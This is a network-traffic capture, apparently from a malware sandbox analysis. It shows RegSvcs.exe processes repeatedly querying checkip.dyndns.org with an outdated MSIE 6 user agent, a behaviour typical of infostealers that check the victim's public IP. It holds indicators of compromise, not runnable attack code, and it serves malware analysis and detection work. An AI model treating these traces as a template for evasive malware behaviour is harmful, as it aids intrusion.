Jan 15, 2025 15:02:05.794229984 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 15, 2025 15:02:06.953885078 CET	730	IN	HTTP/1.1 502 Bad Gateway Date: Wed, 15 Jan 2025 14:02:06 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive X-Request-ID: 077e7e332e0fec47fd33d42812ef7cb7 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jan 15, 2025 15:02:06.957849026 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 15, 2025 15:02:08.114996910 CET	730	IN	HTTP/1.1 502 Bad Gateway Date: Wed, 15 Jan 2025 14:02:08 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive X-Request-ID: 7a7675ae047d69ca007741551098b60c Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jan 15, 2025 15:02:08.123712063 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 15, 2025 15:02:09.288652897 CET	730	IN	HTTP/1.1 502 Bad Gateway Date: Wed, 15 Jan 2025 14:02:09 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive X-Request-ID: 127ab0e06e488256cfd705c4e131c9c8 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jan 15, 2025 15:02:09.292653084 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 15, 2025 15:02:10.362726927 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:02:10 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 92ce306c1bcf3d243dba7124121c2129 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 15, 2025 15:02:11.397558928 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 15, 2025 15:02:12.257038116 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:02:12 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 37c314882dd60ca09e1ad91e48d4b936 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49775	158.101.44.242	80	7800	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 15:02:12.925359011 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 15, 2025 15:02:13.894788027 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:02:13 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2c44664aefdef7e1ff6bf9f2f975daa6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49776	158.101.44.242	80	8060	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 15:02:13.432275057 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 15, 2025 15:02:14.590290070 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:02:14 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 020819823ef693b3b8cf6e32865dfce4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 15, 2025 15:02:14.594630003 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 15, 2025 15:02:15.746588945 CET	730	IN	HTTP/1.1 502 Bad Gateway Date: Wed, 15 Jan 2025 14:02:15 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive X-Request-ID: 99d341be87ba8875a8d6745ac85bc713 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jan 15, 2025 15:02:15.758577108 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 15, 2025 15:02:16.911761045 CET	730	IN	HTTP/1.1 502 Bad Gateway Date: Wed, 15 Jan 2025 14:02:16 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive X-Request-ID: e4caa62fd1af9f39293dc14df632e628 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jan 15, 2025 15:02:16.954657078 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 15, 2025 15:02:18.108984947 CET	730	IN	HTTP/1.1 502 Bad Gateway Date: Wed, 15 Jan 2025 14:02:18 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive X-Request-ID: ce774ab44977a09afab494f0d1bb69b2 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jan 15, 2025 15:02:18.113308907 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 15, 2025 15:02:19.266153097 CET	730	IN	HTTP/1.1 502 Bad Gateway Date: Wed, 15 Jan 2025 14:02:19 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive X-Request-ID: 9ce3770424ececd4619492b9246fb57d Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jan 15, 2025 15:02:19.320744991 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 15, 2025 15:02:20.434092999 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:02:20 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9dd20d22ffd8c57520aba55836c914a7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 15, 2025 15:02:21.117599964 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 15, 2025 15:02:22.269556999 CET	730	IN	HTTP/1.1 502 Bad Gateway Date: Wed, 15 Jan 2025 14:02:22 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive X-Request-ID: acbd58a216ca34e4836e40106f33d127 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jan 15, 2025 15:02:22.273173094 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 15, 2025 15:02:23.348242998 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:02:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 27a1e2c8defe99ec5a0e399db6859a1e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49784	158.101.44.242	80	7800	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 15:02:14.537477970 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 15, 2025 15:02:15.904639959 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:02:15 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 429a95c389c1a9d616212c56465fdda6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49853	158.101.44.242	80	8060	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 15:02:23.997052908 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 15, 2025 15:02:25.206979036 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 14:02:25 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d71816f8de19819bd77b7a77152ddd43 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49865	158.101.44.242	80	8060	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
